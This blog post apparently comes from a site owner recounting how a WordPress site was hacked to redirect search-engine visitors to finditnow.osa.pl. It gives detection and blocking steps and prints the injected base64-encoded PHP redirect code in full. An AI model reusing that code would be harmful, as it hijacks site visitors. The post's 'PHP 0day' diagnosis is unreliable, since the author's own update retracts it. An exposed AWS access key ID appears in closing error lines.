Late last night I realized that the traffic for Question-Defense.com was way down for the day and thought it was related to some recent updates I had performed on the site. I spent probably an hour or so last night verifying that nothing was out of the ordinary with the site and wasn’t able to find any issues. Upon waking up this morning the traffic again was extremely low for this time of the day even on a Saturday so we started to investigate. One of the referrers that traffic had dramatically decreased for was Google so we went to Google and performed a search that we knew would return a link to Question-Defense.com. Sure enough upon clicking on the link to Google we hit the question-defense.com URL and then we were immediately redirected to finditnow.osa.pl. Below we describe the issue in more detail, provide specifics about how our site was hacked, and provide the information needed to locate and resolve the problem.

*** UPDATE ** PLEASE READ ** LIKELY NOT A VIRUS/SPYWARE/MALWARE ***





If you found this article because you were redirected to the finditnow.osa.pl site and thought your computer has been infected with some form of virus, spyware, or malware infection that is likely not the case. Instead the site you were trying to visit has likely been exposed to a PHP 0day vulnerability which can easily be resolved if the webmaster of the site is aware of the issue. You can also visit the site directly as only search results are being redirected by the hack that was performed. So please visit the site directly and contact the webmaster via the sites contact form to let them know you believe their site has been hacked. You can either explain the issue to them or send them the link to this article to let them know how they can resolved the issue and you will have done your good deed for the day!





*** UPDATE 2 ***





I don’t believe this is a bug with PHP anymore but do believe that this is a XSS attack which you can defend against using the .htaccess file located in the root of your site. If you are using WordPress you can accomplish this using the Bulletproof Security plugin which can be downloaded from the WordPress Plugins site. If you are using another type of software the below entries in .htaccess will send back a 403 forbidden message when the attempt to hack your site is made.





.htaccess Entry To Block XSS Attack:

bash

RewriteCond % { QUERY_STRING } base64_encode. * \ ( . * \ ) [ NC,OR ] RewriteRule ^ ( . * ) $ – [ F,L ]

How We Located The finditnow.osa.pl Hack:

Again after spending some time looking over recent updates to the question-defense.com site we wanted to see this from a customers aspect and went to Google to perform a search. The search we performed is noted below.

Search Performed On Google:

bash

xbox 360 : your nat type is moderate

So when clicking the link returned by Google, which happened to be third down, we hit the question-defense.com link provided but we were immediately redirected to finditnow.osa.pl as shown in the below example picture.

Google Search Results Hijacked By finditnow.osa.pl:

When everything is functioning properly the QD results from Google should have sent the customer to the below page instead. You will notice that the hack is clever by taking the results from Google and redirecting to a new page with results on the same subject.

Google Search Results Not Hijacked By finditnow.osa.pl:

So we were able to track the issue to being on the site itself. After a short amount of time we located the PHP 0day with PHP 5.2.X which allows people to modify files hosted on the server running PHP 5.2.X. In this example the hackers performing the 0day used a clever way to not redirect all traffic and generate traffic for the osa.pl domain by only overwriting two files on a web site running WordPress to only redirect traffic from search engines. This is really clever for numerous reasons including the fact that when you are attempting to locate the issue with a downsizing in traffic to your site you are likely to go directly to your site and it will appear to function without issue. Until you perform a Google search or a search using another search engine such as Bing, Yahoo, Baidu, Search, etc. then you will think everything is working without issue.

Fix finditnow.osa.pl Hack On WordPress Site:

First off you should upgrade PHP from version 5.2.X to 5.3.X immediately which will stop the 0day from being performed on your site again. On CentOS Linux you can simply type “yum update PHP” to upgrade PHP. Make sure the upgrade takes you to 5.3.X and if not search for a Yum repo that does include a 5.3.X version of PHP. After upgrading PHP which can be done using numerous different repositories such as CHL, Atomic, and numerous others you should look in the wp-content directory located in the root of your WordPress site. The files modified in our case included advanced-cache.php and wp-cache-config.php however it may be these same files are others on your site so you should use the below command from the root of your web site to located all of the modified files.

Search For Modified Files That Redirect Users To finditnow.osa.pl:

bash

grep -r & quot; eval ( base64_decode & quot; *

The above search from the root of your web site from the Linux command line should return any infected files which again on our WordPress site included advanced-cache.php and wp-cache-config.php only. Below is the snipit of PHP code added to the top of each file that performed the redirect to finditnow.osa.pl.

PHP Code Used To Redirect Users To finditnow.osa.pl:

php

eval ( base64_decode ( & quot ; ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2J1eW9yZGllLm9zYS5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0 =& quot ; ) ) ;

The above code was inserted directly after “<?php” at the top of each of the modified files. Once removed the traffic directed from Google immediately started working again. Again make sure you upgrade PHP 5.2.X to PHP 5.3.X because if not your site will continue to be manipulated in this manner and you will lose all of your search engine traffic.

APPIP ERROR: amazonproducts[ AccessDeniedAwsUsers|The Access Key Id 1ZNGM52M8EWAXJFFRR82 is not enabled for accessing this version of Product Advertising API. Please migrate your credentials as referred here https://webservices.amazon.com/paapi5/documentation/migrating-your-product-advertising-api-account-from-your-aws-account.html. ]

APPIP ERROR: amazonproducts[ AccessDeniedAwsUsers|The Access Key Id 1ZNGM52M8EWAXJFFRR82 is not enabled for accessing this version of Product Advertising API. Please migrate your credentials as referred here https://webservices.amazon.com/paapi5/documentation/migrating-your-product-advertising-api-account-from-your-aws-account.html. ]